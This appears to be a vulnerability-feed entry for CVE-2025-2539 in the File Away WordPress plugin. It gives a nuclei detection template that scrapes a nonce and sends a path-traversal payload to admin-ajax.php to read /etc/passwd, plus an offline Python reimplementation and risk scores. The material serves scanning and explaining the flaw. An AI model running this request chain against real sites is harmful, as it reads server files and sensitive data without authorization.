
File Away <= 3.9.9.0.1 - Missing Authorization to Unauthenticated Arbitrary File Read

Reported by ProjectDiscovery on 05 Jul 2026 03:01:21. Type: nuclei template. Source: github.com

File Away plugin for WordPress allows unauthenticated file read due to missing authorization check.

Code
id: CVE-2025-2539

info:
  name: File Away <= 3.9.9.0.1 - Missing Authorization to Unauthenticated Arbitrary File Read
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    The File Away plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ajax() function in all versions up to, and including, 3.9.9.0.1. This makes it possible for unauthenticated attackers, by leveraging a reversible weak encryption algorithm, to read the contents of arbitrary files on the server, which can contain sensitive information.
  impact: |
    Unauthenticated attackers can exploit weak encryption and missing authorization to read arbitrary files from the server, potentially exposing sensitive documents, configuration files, and user data.
  remediation: |
    Upgrade to File Away version 3.9.9.1 or later that implements proper capability checks and stronger encryption.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/file-away/file-away-39901-missing-authorization-to-unauthenticated-arbitrary-file-read
    - https://plugins.trac.wordpress.org/browser/file-away/trunk/lib/cls/class.fileaway_encrypted.php
    - https://plugins.trac.wordpress.org/browser/file-away/trunk/lib/cls/class.fileaway_stats.php
    - https://wordpress.org/plugins/file-away/#developers
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b23bd5c-db27-4d63-8461-1f36958a2ff6?source=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-2539
    cwe-id: CWE-327
    epss-score: 0.0155
    epss-percentile: 0.72085
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/file-away/"
  tags: cve,cve2025,lfi,file-away,wordpress,wp-plugin,wp,vkev,vuln

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - 'fileaway_stats.*admin-ajax.php","nonce":"([0-9a-zA-Z]+)"}'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=fileaway-stats&nonce={{nonce}}&file=/../../../../../../../../etc/passwd

    matchers:
      - type: word
        part: body
        internal: true
        words:
          - fileaway_download

    extractors:
      - type: regex
        part: body
        internal: true
        name: download_url
        group: 1
        regex:
          - '".*(\?.*?)"'

  - raw:
      - |
        GET /{{download_url}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'

      - type: word
        part: content_type
        words:
          - "application/force-download"
# digest: 4a0a0047304502204fcc41e144a20a982d3838cfb0ebcd558e9b1614ff14584cfd164e98bd1ebba7022100f6b6621f12ad74e9b5034d950d90e661c00e64c0218fd448dff98113146ef9a4:922c64590222798bb761d5b6d8e72950
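Worked example, added here as an editor's illustration (it is not part of the nuclei template above, nor code from the File Away plugin): the template's three-step flow reimplemented in Python so that each step's extractor and matcher can be exercised offline against constructed responses. The regular expressions, the `fileaway-stats` action, the traversal payload and the final content-type and `root:.*:0:0:` matchers are copied from the template; everything else is an assumption. The sample front page is shaped like a `wp_localize_script` blob so that the nonce regex fires, and the sample ajax reply (its JSON layout and the `dl` query parameter) is a placeholder, since the plugin's real response format is not shown on this page. One caveat worth knowing: WordPress derives nonces for logged-out visitors with user ID 0 and no session token, so the nonce scraped from the front page is reusable in a cookie-less second request, which is why the template needs no session handling.

```python
import re
from typing import Optional
from urllib.parse import urlencode

# Patterns copied verbatim from the nuclei template (Go RE2 and Python re agree on them).
NONCE_RE = re.compile(r'fileaway_stats.*admin-ajax.php","nonce":"([0-9a-zA-Z]+)"}')
DOWNLOAD_QUERY_RE = re.compile(r'".*(\?.*?)"')
PASSWD_ROOT_RE = re.compile(r'root:.*:0:0:')

# Traversal payload exactly as the template's second request sends it.
TRAVERSAL_PATH = "/../../../../../../../../etc/passwd"


def extract_nonce(home_html: str) -> Optional[str]:
    """Step 1: pull the logged-out WordPress nonce that the plugin's
    localized `fileaway_stats` script object embeds in the front page."""
    m = NONCE_RE.search(home_html)
    return m.group(1) if m else None


def build_stats_body(nonce: str, file_path: str = TRAVERSAL_PATH) -> str:
    """Step 2 request body for POST /wp-admin/admin-ajax.php.
    safe='/' keeps the slashes literal, matching the template's raw body."""
    return urlencode(
        {"action": "fileaway-stats", "nonce": nonce, "file": file_path}, safe="/"
    )


def extract_download_query(ajax_body: str) -> Optional[str]:
    """Step 2 matcher + extractor. The template's capture group runs from the
    last '?' that precedes a closing quote up to that quote, i.e. it keeps only
    the query string; step 3 then requests it against the site root (GET /<query>)."""
    if "fileaway_download" not in ajax_body:
        return None
    m = DOWNLOAD_QUERY_RE.search(ajax_body)
    return m.group(1) if m else None


def is_arbitrary_read(content_type: str, body: str) -> bool:
    """Step 3 matchers, AND-ed as in the template: a forced download whose
    body carries the root line of /etc/passwd."""
    return (
        "application/force-download" in content_type
        and PASSWD_ROOT_RE.search(body) is not None
    )


def run_offline(home_html: str, ajax_body: str, dl_content_type: str, dl_body: str) -> dict:
    """Drive the three steps over captured or constructed responses without
    touching the network; reports how far the flow got and what it produced."""
    nonce = extract_nonce(home_html)
    if nonce is None:
        return {"stage": 1, "vulnerable": False}
    query = extract_download_query(ajax_body)
    if query is None:
        return {"stage": 2, "nonce": nonce, "vulnerable": False}
    return {
        "stage": 3,
        "nonce": nonce,
        "stats_body": build_stats_body(nonce),
        "download_path": "/" + query,
        "vulnerable": is_arbitrary_read(dl_content_type, dl_body),
    }


# --- Constructed sample responses (assumptions, not captured from a real site) ------
# Shape of a wp_localize_script blob that the nonce regex expects; the nonce is made up.
SAMPLE_HOME = (
    '<script>var fileaway_stats = {"ajaxurl":"https://target.example/wp-admin/'
    'admin-ajax.php","nonce":"a1b2c3d4e5"};</script>'
)
# Placeholder ajax reply: the plugin's real JSON layout and query parameter name are
# not given on this page; this only satisfies the template's word matcher and regex.
SAMPLE_AJAX = '{"fileaway_download":"https://target.example/?dl=placeholder-token"}'
SAMPLE_DL_CT = "application/force-download"
SAMPLE_DL_BODY = "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"

if __name__ == "__main__":
    print(run_offline(SAMPLE_HOME, SAMPLE_AJAX, SAMPLE_DL_CT, SAMPLE_DL_BODY))
```

The harness never issues requests itself; feed it responses you have captured from a system you are authorized to test. Its main value is showing what each nuclei extractor actually keeps: the second step's group yields only `?dl=...`, so the third request is made against the site root, not against a plugin path.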

Scoring (as of 04 Feb 2026 07:00): Vulners AI Score 7.3 (High risk); CVSS 3.1 7.5; EPSS 0.0155.